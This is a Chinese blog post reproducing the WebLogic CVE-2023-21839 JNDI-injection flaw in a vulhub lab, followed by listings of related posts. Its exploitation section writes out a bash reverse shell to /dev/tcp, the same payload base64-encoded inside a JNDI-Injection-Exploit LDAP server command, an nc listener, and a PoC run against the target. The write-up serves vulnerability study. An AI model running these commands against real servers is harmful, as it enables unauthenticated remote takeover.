WebLogic:CVE-2023-21839[JNDI注入]

于 2024-08-01 14:12:07 发布
阅读量120 收藏 3
点赞数 1
文章标签: 安全 web安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h1008685/article/details/140846137
版权

原理

1、T3/IIOP协议支持 远程绑定对象 bind到服务端,而且可以通过lookup代码 c.lookup("xxxxxx"); 查看   
2、远程对象继承自OpaqueReference并lookup查看远程对象时,服务端会调用远程对象 getReferent 方法
3、由于 weblogic.deployment.jms.ForeignOpaqueReference继承自 OpaqueReference并实现getReferent方法,存在retVal = context.lookup (this.remoteJNDIName)实现,
所以能够通过RMI/LDAP远程协议进行远程命令执行

环境部署

1.进入靶场目录

cd /vulhub-master/weblogic/CVE-2023-21839

2.开启靶场【报错重启docker服务】

[root@localhost CVE-2023-21839]# docker-compose up -d
 
3.查看靶场端口

[root@localhost CVE-2023-21839]# docker ps

 4.访问靶场

192.168.10.5:7001

漏洞利用

 1.生成指定格式payload 

bash -i >& /dev/tcp/192.168.10.128/7777 0>&1

转换网站:Runtime.exec Payload Generater | AresX's Blog (ares-x.com)

2.kali启动LDAP服务器,指定payload。复制JDK连接地址
java -jar JNDI-Injection-Exploit-1.0.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEyOC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}"

3.kali监听本机 7777 端口

nc -lvp 7777

4.windows主机向漏洞服务器发送poc
CVE-2023-21839.exe -ip 192.168.10.5 -port 7001 -ldap ldap://192.168.10.128:1389/lodgjh

5.建立连接

Zeddm
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Weblogic-CVE-2023-21839
Continuejww的博客
12-14 880
RCE漏洞,该漏洞允许未经身份验证的远程,通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致Oracle WebLogic服务器被接管,通过远程协议进行远程命令执行,当或本地存在小工具(javaSerializedData)时,可能导致远程代码执行。由此可见:CVE-2023-21839是一个weblogicJNDI注入漏洞。
CVE-2023-21839漏洞复现
qq_34914659的博客
02-28 4046
CVE-2023-21839漏洞复现
N!Weblogic CVE-2023-21839 RCE
潇湘信安的博客
07-18 231
Weblogic CVE-2023-21839/CVE-2023-21931/CVE-2023-21979 一键检测工具,这是来自长亭xray的代码,该漏洞扫描已集成到新版本xray中。
【漏洞复现】Weblogic CVE-2023-21839
zg_111的博客
03-23 6492
Weblogic CVE-2023-21839漏洞复现
CVE-2023-21839漏洞本地简单复现
crowsec
02-27 5031
CVE-2023-21839漏洞复现
Weblogic远程代码执行CVE-2023-21839复现及修复
szgyunyun的博客
03-16 629
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。jdk1.8打包好的jar公众号回复"CVE-2023-21839"vps启用监听反弹端口。
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
rumil的博客
09-19 7836
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
weblogic系列所有漏洞复现弱口令、CVE-2023-21839CVE-2018-2894、CVE-2017-10271
qq_47289634的博客
07-05 2193
WebLogic是由Oracle公司开发和提供的一款Java应用服务器。它是一个成熟、可靠且高性能的中间件平台,用于构建、部署和管理企业级Java应用程序。
CVE-2021-2109 WebLogic JNDI 注入
蚁景网安学院
03-02 415
0x01 前言学习一下 WebLogic JNDI 注入 RCE(CVE-2021-2109)0x02 环境搭建和之前 WebLogic 的环境搭建是一致的,本文不再赘述。不过值得一提的是,我的 weblogic 版本是 10.3.6;需要手动添加\server\lib\consoleapp\webapp\WEB-INF\lib\console.jar到依赖里面0x03 漏洞分析与复现漏洞影响...
JNDIExploit.v1.4 Weblogic-CVE-2023-21839
03-10
2023年,Weblogic服务器被发现存在一个名为CVE-2023-21839安全漏洞,该漏洞源于Weblogic Server对JNDI的不安全配置。攻击者可以通过构造恶意的JNDI引用,诱导服务器执行远程代码,从而实现远程命令执行。这种...
weblogic-CVE-2023-21839-JNDIExploit-1.4-SNAPSHOT.jar
02-28
weblogic-CVE-2023-21839-JNDIExploit-1.4-SNAPSHOT.jar
CVE-2020-14645:Weblogic CVE-2020-14645 UniversalExtractor JNDI注入getDatabaseMetaData()
03-08
CVE-2020-14645 Weblogic CVE-2020-14645 UniversalExtractor JNDI注入getDatabaseMetaData() 项目取决于演示版要求JDK版本<JDK6u211 / 7u201 / 8u191 Weblogic版本12.2.1.4.0 不要非法使用!!!!!参考 谢谢...
CVE-2021-2109:通过JNDICVE-2021-2109 && Weblogic Server RCE
05-26
描述 Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0和14.1....步骤3:设定JNDI伺服器 java -cp marshals
weblogic CVE-2018-3191 exp(含weblogic-spring-jndi-10.3.6.0.jar)
07-05
自用CVE-2018-3191 weblogic反序列化exp。
隧道可视化:实时监控保障行车安全
最新发布
HT for Web 3D
07-27 345
通过图扑可视化实现隧道的实时监控、数据分析及智能报警系统,提供全面的隧道管理和决策支持,提升行车安全,优化维护策略,确保交通顺畅。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1231
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 743
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
网络安全相关竞赛比赛
黑战士的博客
07-18 1408
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
CVE-2023-21839
08-17
CVE-2023-21839是一个Weblogic漏洞,可以导致远程代码执行。根据引用提供的信息,可以使用nc工具进行端口监听,用于接收反弹的shell。你可以在给出的GitHub链接中找到可用的工具。使用该工具前,需要先编译为可执行文件。另外,在引用中提到,可以使用docker-compose启动CVE-2023-21839漏洞环境。具体命令为sudo docker-compose up -d。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2023-21839Weblogic反序列化漏洞复现](https://blog.csdn.net/weixin_48539059/article/details/130101435)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2023-21839EXP可执行文件](https://download.csdn.net/download/qq_51577576/87559811)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值